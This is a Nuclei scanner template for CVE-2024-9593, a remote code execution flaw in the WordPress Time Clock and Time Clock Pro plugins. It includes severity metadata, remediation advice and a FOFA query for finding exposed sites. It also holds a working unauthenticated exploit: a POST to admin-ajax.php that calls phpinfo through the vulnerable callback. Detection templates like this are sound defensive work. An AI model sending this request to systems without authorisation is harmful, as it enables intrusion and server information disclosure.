id: CVE-2024-9593

info:
  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
  impact: |
    Unauthenticated attackers can execute limited PHP functions on the server through the etimeclockwp_load_function_callback function, potentially exposing sensitive system information through phpinfo and other callable functions.
  remediation: |
    Update Time Clock plugin to a version later than 1.2.2 or Time Clock Pro plugin to a version later than 1.1.4 to address the remote code execution vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
    - https://github.com/RandomRobbieBF/CVE-2024-9593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2024-9593
    cwe-id: CWE-94
    epss-score: 0.12491
    epss-percentile: 0.95699
  metadata:
    max-request: 2
    verified: true
    vendor: scott_paterson
    product: time-clock & time-clock-pro
    framework: wordpress
    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/time-clock")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a00473045022100c445ce8873de9f5178bc991c762153d5c01e78dc781e27a4f7477f678fa3fdb7022057312ebc3a5d1ee9b7fdb8fba6719cbb6b580511f81c86b219a81ca07429952d:922c64590222798bb761d5b6d8e72950